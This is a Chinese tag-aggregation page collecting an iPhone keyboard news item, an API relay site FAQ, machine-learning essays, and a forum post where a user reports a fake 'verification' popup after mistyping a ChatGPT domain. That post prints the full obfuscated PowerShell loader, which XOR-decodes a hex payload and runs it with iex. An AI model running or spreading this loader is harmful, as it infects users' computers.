WWW.YOUINFO.SITE
标签聚合 误会

/tag/误会

IT之家 · 2026-06-04 16:03:21+08:00 · tech

IT之家 6 月 4 日消息,词条“苹果输入法你上过学没有”近日冲上热搜,引发大量使用苹果手机的网友前来吐槽 iPhone 的原生输入法, 更有网友称其是“九年义务教育的漏网之鱼” 。 根据网友分享,iPhone 原生输入法预选词出现的错误包括 wu gu ji zhua 首选词是“无辜鸡爪”(原本应该是无骨鸡爪)、luo zi wu hui 首选词是“骡子误会”(原本应该是落子无悔)、ping sha luo yan shi 首选词是“平时刘烨说”(原本应该是平沙落雁式)等。 值得一提的是,iPhone 原生输入法的 26 键模式和 9 键模式闹出的笑话又有不同,例如 lao shi 首选词是“老鼠”(原本应该是老师)。同时还有网友遇到连续输入一长串拼音结果输入法没有提供联想词, 反而直接以拼音的形式输入进文档或者聊天框内 。 IT之家也对此进行了实测,在刚刚升级至 iOS 26.5.1 版本的 iPhone Air 上,使用 Safari 浏览器进行搜索,iPhone 原生自带输入法仍然会在联想词这块闹出笑话, 例如“无辜鸡爪”、“棒打县城(原本应该是棒打鲜橙)”等仍然是排在首位的预选词 。

LinuxDo 最新话题 · 2026-06-03 01:15:28+08:00 · tech

投入成本 代理池2家美国,其他商户买的家庭宽带,平均成本2000美金一个月(跟随请求数量增长)。 官方Anthropic代理Key 2000美金左右一个月,(随着请求数量多了消费可能会翻倍) 每次请求都是镜像请求。双倍消耗流量。 服务器1350美金一年。 回答小伙伴的疑虑 Q:我们会不会偷key A:不会永远不会,因为没意义,我们的成本已经高于你测试一次消耗的API成本了,对于我们来说没必要。 Q:会不会收费,被收买。 A:不会,如果有人试图收买我们会曝光这家中转站。 Q:后期会不会移交站点的管理权。 A:几个月后可能会,到时候我会通知大家。 Q:初衷是什么。 A:做事情问心无愧就好了,可以看我之前开源的内容与公益的AI服务。 Q:代码会不会开源 A:短时间不会开源。 Q:为什么一定要走服务器呢,通过浏览器不行吗。 A:因为有代理 + 官方的key请求进行校验问题回答,以及题库,这些都是没办法弄到前端的,如果就是在前端请求那么这个监测站的模式可能就得改一下了。 写在最后 测试站 排行榜(模糊处理域名) 18 个帖子 - 7 位参与者 阅读完整话题

LinuxDo 最新话题 · 2026-05-17 03:04:26+08:00 · tech

打开chatgpt不小心输入成chatpgpt了 刚开始误会机场了,刚看了下历史记录才发现的,看到弹出来这个病毒下载我上头了,我第一时间不严谨判断问题。非常抱歉 请问哪里能删帖。 用chatgpt分析了一下。看来就是病毒了,太出生了,机场还搞这种事 这个是病毒的下载代码,刚打开了一下弹出来这个界面。 <# Verification code: 0BA8B4F84B0C #> $w23='fdIhvlzT';$x24='42127f1c141a4d69413f1a1105181f39482a2c1c583f1f26100d2a0d2603133a12292806170b1f263b5e733b130f0f260f10303804030e3b050b25552d3f03271201244638090e7a35012a1d04050e2d3616261c190f1538321d390d2b5640000a17785a4d4819675b2e260118412a35120c694c13020c6e32210438564421071f173d0d1b42331b4834281c1e31406e21013d3a17021e3b0b22200413221b39034c60414d221f234b2d3d0d1b4c571d1201243c0f1c1f74220d3b0d151815261f4464381718127442077a485b2a1526050135270318571a1308255352084e692c0b20065b3c1b200e446d0b454c520f351d3a1c1301541d294a19090204276e5c232c1c240d143009090f011a0934350b0161415d4b5d7a031c2c4f51454170035174584d0a15264e402f5e4b5c4170005269451a185a6746492806124c573a0910694c13594170005262435f170e261f1f0006000311314b332c0a24090b2103173d485b39083d46436e0002180a275c4b660c03081b300308201a1742173b08173d0d04431b240f4b20061209027a160c395717511e3840102603130247300351790b430a426302057f5c465a486c555c7a5c4f0d4c3055512f5f410948660406705b450d42310702705b475c483600552b50120e4a355e54780d4e5d437215162a550409193516102a00174a19365b07211a19011f7214012f551e180e2415417a29535e3c7154222618171d0f31150c2c041a1f1532121724071d0954370a0d2a03535e3c720b0b2d0d4b1e1f3707143d0b1e0d5d734649061d022a133803446d0c424c570115010b090505190407163a01180b413d004c1d0d051857040710214852084e7d1d402c5d4b5d07310a172c1325181b2612491a0413090a744b372c0b19021e2746563415150d0e370e1f1a1c171e0e7935082c0d064c570703072606121f5a661b1972011044573a09106940220909204b34281c1e4c5e30524d6013131413201b5f1a1c171e0e793616260b131f09744b222004133c1b200e446d0c424c57030f0a2d07013f0e2d0a0169201f081e31085f3d1a0f1728310b0b3f0d5b250e310b4464241f181f260708190902045a7002506945300308370344642d041e152627073d0119025a070f082c0602000317090a3d0118191f2905053d0b1e17076f415f1a1c171e0e793616260b131f09744b33200612030d07121d250d562413300201274806030d311417210d1a005a7927162e1d1b0914202a0d3a1c564b571a09343b071005163141486e452105143009131a1c0f001f734a43010112081f3a41486e4535031739070a2d4f5a480c6212063f5f4d09023d12';$y25='';for($z26=0;$z26 -lt $x24.Length;$z26+=2){$y25+=[char](([convert]::ToInt32($x24.Substring($z26,2),16))-bxor[int][char]$w23[$z26/2%$w23.Length])};iex $y25 18 个帖子 - 8 位参与者 阅读完整话题

linux.do · 2026-05-01 19:12:31+08:00 · tech

本贴为简论机器学习的集合贴。 前言 [长文手敲] 简论机器学习——前言 搞七捻三 在机器会学习之前,人类先学会了偷懒 谈机器学习之前,最好先把一个经典的误会放到桌面上。 很多人第一次听到机器学习,脑子里浮现的画面大概是这样的。机房深处,一台通体发光的服务器缓缓睁眼,屏幕上飘过一串绿色代码,然后它用冷酷的电子音宣布,人类,我已经掌握了你们的秘密。(天网的算力都不够现在的LLM用的) 这画面很赛博,很带感,很适合拿去剪短视频,配上低沉旁白,再加一句经典台词。 时代变了。 可… 1 个帖子 - 1 位参与者 阅读完整话题

linux.do · 2026-05-01 19:11:54+08:00 · tech

在机器会学习之前,人类先学会了偷懒 谈机器学习之前,最好先把一个经典的误会放到桌面上。 很多人第一次听到机器学习,脑子里浮现的画面大概是这样的。机房深处,一台通体发光的服务器缓缓睁眼,屏幕上飘过一串绿色代码,然后它用冷酷的电子音宣布,人类,我已经掌握了你们的秘密。( 天网的算力都不够现在的LLM用的 ) 这画面很赛博,很带感,很适合拿去剪短视频,配上低沉旁白,再加一句经典台词。 时代变了。 可惜现实通常没这么酷。 更多时候,机器学习的现场看起来像这样。 一个人坐在电脑前,盯着报错看了半小时,发现路径写错了。一个模型训练了八个小时,最后准确率还不如随机森林。 一个神经网络参数量大得吓人,结果上线后被用户一句方言干沉默。 老板问为什么效果不稳定,工程师说数据还需要清洗。 老板问清洗多久,工程师低头看了一眼表情包,心想这事儿已经不属于科学,属于渡劫。 所以机器学习这东西,表面看是人工智能的核心技术之一,里面装着数学、统计、优化、工程、算力和一堆听起来很高端的名词。 可如果把外壳剥掉,它动机其实很简单。 人类想让机器从经验里总结规律,然后替自己做判断。 这句话听起来平平无奇,可它背后藏着现代技术世界最重要的一次思维转向。 过去我们让机器工作,通常要把规则一条一条写清楚。你这样做,它就那样反应。 像教一个极其死板的员工,连倒水都得写操作手册,先拿杯子,再接水,再检查水位,最后把杯子放到桌上。流程清楚,责任明确,出事好甩锅。 可现实世界偏偏最讨厌清楚。 垃圾邮件长什么样,能不能靠几条规则说完? 用户明天想买什么,能不能靠一句公式算准? 一张猫图和一张狗图之间的区别,能不能靠人工写完所有特征? 银行判断一个人会不会违约,医院判断一张片子有没有异常,平台判断一条内容有没有风险,导航判断哪条路更快,这些问题都很现实,也都很麻烦。 你要是靠人手写规则,很快就会发现自己像在用牙签修长城。 规则写得少,漏得一塌糊涂。 规则写得多,互相打架,越修越玄学。 最后系统变成一坨祖传代码,谁也不敢动,动一下全公司陪葬。 老员工看了沉默,新员工看了辞职,产品经理看了开始讲愿景。 机器学习登场的地方,往往就是这种规则工程快要绷不住的地方。 它说,既然我们很难直接写出规律,那就把大量样本交给机器,让机器自己从样本里找规律。 你给它很多邮件,告诉它哪些是垃圾邮件,哪些是正常邮件;你给它很多图片,告诉它哪些是猫,哪些是狗;你给它很多用户行为,告诉它哪些点击了,哪些跳出了。然后模型就在这些数据里反复试错,调整自己,直到它在新样本上也能做出还算靠谱的判断。 听上去像魔法。 实际像刷题,刷多了就会了。 模型没有突然开悟,也没有夜观天象。 它只是看了很多题,做错了就改参数,改完再做,继续错,继续改。数学上叫优化,工程上叫训练,老板嘴里叫怎么还没好,网友嘴里叫炼丹。 从写规则到喂数据,技术世界的权力交接 如果说传统编程像立法,机器学习就像培养习惯。 传统编程的核心是规则。人类先理解问题,再把解法写成代码。程序执行的是人的明确意图。 哪里错了,通常还能顺着逻辑往回找。虽然过程也痛苦,但至少痛苦得比较有尊严。 机器学习的核心是数据。人类不再把全部规则写死,而是提供样本、目标和训练方式,让模型自己拟合一个函数。 这个函数可能非常简单,也可能复杂得像一碗被打翻的电路板。它能给出结果,却未必能给出人类满意的解释。 这就很有意思了。 过去我们问程序,为什么你输出这个结果? 程序说,因为第十七行 if 条件成立。 现在我们问模型,为什么你判断这张图是猫? 模型大概会用一堆权重、激活、特征空间、概率分布组成一个眼神,表示你要不自己体会一下。 这也是机器学习让人又爱又恨的地方。 它确实能解决很多传统规则难以处理的问题。语音识别、图像识别、推荐系统、风控模型、搜索排序、机器翻译,背后都大量使用机器学习方法。 你每天打开手机刷到的内容,看到的广告,输入法给你的联想,地图给你的路线,电商给你的推荐,很多都和机器学习有关。 它已经不是实验室里供人参观的奇观,而是数字社会的基础设施。 可它也带来了新的麻烦。模型会犯错,而且犯错方式有时很迷。它可能在训练集上表现优秀,一到真实世界就原形毕露。它可能学到了数据里的偏见,然后一本正经地把偏见包装成判断。 它可能在某些样本上强得离谱,在另一些边角场景里菜得离谱。它还可能被异常输入轻松干扰,像一个平时成绩很好,一到开放题就开始胡言乱语的学生。 所以机器学习从来不只是算法问题。 它牵扯数据质量,牵扯工程部署,牵扯业务目标,牵扯安全边界,牵扯责任归属。一个模型在论文里拿了高分,并不意味着它进了生产环境还能体面做人。 论文里的世界通常干净整洁,数据集整理好了,指标定义好了,评测流程也安排好了。 现实世界则像一个刚被三百个人同时改过需求的项目群,噪声满地跑,异常天天来,用户永远能用你想不到的姿势把系统玩坏。 这时候你就会理解,为什么很多机器学习项目最后死得很安静。 立项时说要智能化转型,上线后发现数据埋点缺失。 方案里写要端到端优化,落地时发现 Excel 才是核心数据库。 PPT 里模型准确率 98%,真实业务里召回一个关键异常都费劲。 大会上讲 AI 赋能千行百业,回到公司发现 GPU 排队比春运抢票还刺激。 机器学习真正学到的,可能只是人类世界的影子 机器学习的魅力,在于它能从经验中抽取模式。 机器学习的危险,也在于它只能从经验中抽取模式。 模型学习的对象并非世界本身,而是数据中的世界。数据记录了现实的一部分,也扭曲了现实的一部分,还遗漏了现实的很大一部分。 你喂给模型什么,模型就从什么里学。数据有偏差,模型就可能把偏差当成规律。数据有噪声,模型就可能把噪声当成暗号。数据覆盖不够,模型就会在没见过的场景里开始自由发挥。 这就像你让一个人只通过短视频理解世界,他当然也能总结规律,甚至总结得头头是道。但他总结出来的东西,可能更像推荐算法喂出来的幻觉宇宙。 比如招聘模型如果长期基于历史录用数据训练,而历史数据本身带有某种倾向,那么模型可能会把过去的倾向继续放大。 比如风控模型如果过度依赖某些相关变量,表面上看是在判断风险,实际上可能在间接复制社会结构中的不平等。 比如内容推荐系统如果只追求点击率,就很容易把人往更刺激、更极端、更容易上头的内容里推。因为从指标上看,用户确实停留更久了。 这就像一个班主任发现学生爱看热闹,于是每天都安排打架围观,最后全年级活跃度拉满,教育目标当场去世。 机器学习没有天然的价值观。 它优化的是目标函数。 你让它最大化点击,它就尽量让人点。 你让它最大化停留,它就尽量让人留下。 你让它最小化损失,它就沿着数学定义里的损失往下爬。 至于这个目标是否合理,是否全面,是否符合人的长期利益,那不是模型自己能解决的问题。模型很努力,但它不知道自己努力的方向有没有问题。它像一个执行力极强的实习生,你让它整理表格,它能通宵干完;你需求写错了,它也能把错误需求执行得非常彻底。 所以机器学习的核心挑战,从来不只是让模型更聪明。 更难的是,我们到底要它聪明在哪儿。 从感知到生成,机器学习开始进入人类表达区 早期机器学习更像一个分类员和预测员。它判断一封邮件是不是垃圾邮件,判断一个用户会不会流失,判断一张图片里有没有目标,判断某个交易是否异常。它在后台默默工作,像一个看不见的助理,做着大量重复、细碎、但很重要的判断。 后来深度学习兴起,图像、语音、文本处理能力迅速提升。 卷积神经网络让机器视觉大踏步前进,循环网络和后来的 Transformer 推动自然语言处理换挡,推荐系统在海量用户行为里反复打磨人的注意力,强化学习在游戏和控制问题中展现出惊人的策略学习能力。 再后来,大模型出来了。 事情开始变得不太一样。 机器不再只是判断你给它的东西是什么,它开始生成东西。写文章,写代码,画图,做总结,翻译,规划任务,调用工具,甚至在某些场景里模拟一个还算靠谱的工作流。以前机器学习更多藏在系统背后,现在它开始走到前台,直接和人对话。 这一步很重要。 因为它让机器学习从感知层进入表达层,从辅助判断进入交互协作,从后台算法进入前台界面。普通人第一次强烈感受到 AI 的存在,往往不是因为推荐系统更准了,而是因为一个聊天框突然能写方案、改代码、讲故事,还能一本正经地胡说八道。 一方面,它确实提高了很多工作的效率。写邮件、查资料、整理思路、生成代码、解释概念,这些任务都可以被显著加速。另一方面,它也让机器学习的老问题变得更显眼。幻觉、偏见、不可解释、数据来源、版权争议、安全滥用、责任归属,全都从幕后冲到了台前。 以前模型错了,可能只是推荐错了一条商品。 现在模型错了,可能是在法律、医疗、金融、教育、代码生成这些高风险场景里用一种很自信的语气错给你看。 最可怕的地方并非它完全不懂,而是它懂一点,又说得很像那么回事。懂一点的人最容易把人带沟里,懂一点的模型也一样。它不会脸红,不会犹豫,甚至还会给你补上一段逻辑顺滑的解释。用户看完以后直呼专业,出事以后才发现这玩意儿属于一本正经地开盲盒。 所以今天谈机器学习,不能再停留在算法名词和模型结构上。 我们必须同时谈工程,谈数据,谈场景,谈边界,谈制度,谈人的位置。 否则就会出现一种很典型的 AI 幻觉式建设。会上大家都在谈智能体,谈自动化,谈闭环,谈重塑产业。会后系统连日志都没打全,异常也没监控,模型输出没有审核,数据权限没人管。看上去像未来科技,实际像草台班子套了个科幻皮肤。 学习这件事,机器做得很快,人类未必跟得上 机器学习之所以值得写一篇又一篇,原因并不只是它技术复杂。 真正重要的是,它正在改变人类处理问题的方式。 过去我们习惯相信,系统的可靠性来自明确规则。现在越来越多系统的能力来自数据驱动和概率判断。过去我们习惯把软件看成确定性的工具,现在越来越多软件开始呈现出不稳定、不完全可解释、需要持续评估的特征。过去我们写代码,是把人类理解变成机器步骤。现在我们训练模型,是把大量经验压缩成可运行的模式。 这背后其实是一种更深的变化。 人类正在把越来越多判断交给统计模型,把越来越多经验交给算法总结,把越来越多流程交给系统自动执行。表面上看,这是效率提升。深处来看,这是认知权力的转移。 谁掌握数据,谁就掌握训练材料。 谁定义指标,谁就定义优化方向。 谁部署模型,谁就影响真实世界的决策链条。 机器学习并非单纯的技术工具,它正在成为组织能力的一部分。一个公司有没有高质量数据,有没有稳定工程平台,有没有靠谱评估体系,有没有模型迭代机制,有没有安全治理能力,决定了它能不能真正用好 AI。只会喊口号没有用。模型不会因为公司愿景写得漂亮就自动变强,GPU 也不会因为 PPT 做得高级就少烧钱。 这也是为什么很多 AI 项目的差距,最后不在模型名上,而在系统能力上。 同样一个开源模型,有的人拿来做了一个稳定可用的行业助手,有的人接上接口以后就开始全员转发截图,三天后发现报错没人会修。技术平权确实发生了,工程差距也一起被放大了。工具降低了入门门槛,却没有取消专业能力。就像有了相机不等于人人会摄影,有了大模型也不等于人人会做 AI 系统。 机器学习看起来是在教机器学习。 实际上,它也在逼人类重新学习如何提出问题。 你到底要预测什么? 数据从哪里来? 标签可信吗? 指标能不能代表真实目标? 模型错了谁负责? 上线后如何监控? 效果下降如何回滚? 用户权益如何保护? 这些问题一个都绕不开。绕开它们,机器学习就会从技术方案变成玄学仪式。大家围着模型转圈,嘴里念着参数、损失、微调、蒸馏、对齐,仿佛只要术语足够密集,系统就会自己长出智慧。 这不叫智能化和自动化。 为什么要写这组简论 写机器学习,最怕写成两种东西。 一种是公式堆砌。上来就是概率论、线性代数、梯度下降、最大似然、反向传播,读者还没进门,先被符号按在地上摩擦。公式当然重要,没有数学基础,机器学习很容易学成调包文学。 可如果一开始就只剩公式,很多人会误以为机器学习是一座只允许数学天才进入的神庙。 另一种是鸡汤科普。把机器学习讲成万能魔法,什么都能预测,什么都能优化,什么行业都能颠覆,最后落到一句拥抱 AI,赢得未来。听完热血沸腾,回去打开 Jupyter Notebook,第一行 import 就报错。 这两种都不太行。 真正值得做的,是在数学、工程、现实之间搭一座能走人的桥。既不把机器学习神秘化,也不把它庸俗化。既承认它的力量,也看清它的局限。既讲算法原理,也讲数据和业务。既讲模型如何训练,也讲模型为什么会翻车。既讲它改变世界的地方,也讲它被世界反复毒打的地方。 所以这组简论的目标很简单。 先把机器学习从神坛上请下来,放到真实世界里看。 它是一套方法,一种工程体系,一种解决复杂问题的思维方式,也是一面镜子。它照见数据里的规律,也照见数据里的偏见;它放大组织的能力,也放大组织的混乱;它能让系统更聪明,也能让错误更自动化。 这也是为什么机器学习值得认真讨论。 因为它已经不只是研究者的论文,不只是工程师的工具,不只是企业的卖点。它正在进入普通人的生活,进入组织的决策,进入社会的基础设施。你可以不写模型代码,但你很难完全避开模型影响。你刷到什么,买到什么,搜到什么,被推荐什么,被审核什么,被评分什么,都可能和机器学习有关。 机器学习没有那么神,也没有那么简单。 它既不是银弹,也不是骗局。它更像一台巨大的现实压缩机,把数据、目标、经验、偏见、算力和工程能力一起压进模型里,然后输出一个看似简单的判断。这个判断可能很有用,也可能很危险。关键在于我们是否理解它从哪里来,能做什么,不能做什么,以及什么时候必须让人类重新接管方向盘。 写在最后 如果说工业时代训练机器,是让机器拥有更强的力气,那么智能时代训练机器,就是让机器拥有某种可迁移的判断能力。 前者改变生产,后者改变决策。 这才是机器学习真正值得警惕,也真正值得期待的地方。 它没有传说中那么玄乎,也没有营销文里那么温柔。它吃数据,烧算力,靠优化前进,被指标牵着鼻子走,在现实世界里不断撞墙,又在一次次撞墙之后变得更有用。它像一个天赋很高但需要严加管理的学生,学得快,忘得也快,擅长总结模式,也容易把错题当秘籍。 我们研究机器学习,并不是为了跪拜模型。 我们研究它,是为了知道这个时代的自动判断从何而来,如何运行,怎样失控,又该怎样被设计、约束和使用。 接下来要进入的,才是机器学习真正的内部世界。数据如何变成经验,经验如何变成模型,模型如何通过损失函数调整自己,为什么梯度下降像是在迷雾里下山,为什么过拟合像背答案背到走火入魔,为什么深度学习能在图像、语言和生成任务里一路狂飙,为什么大模型看起来像会思考,实际又经常一本正经地翻车。 机器学习这门课,表面学算法,深处学现实。 因为机器能学到什么,往往取决于人类给了它什么。 而人类愿意把什么交给机器学习,最终会反过来塑造我们自己的世界。 4 个帖子 - 2 位参与者 阅读完整话题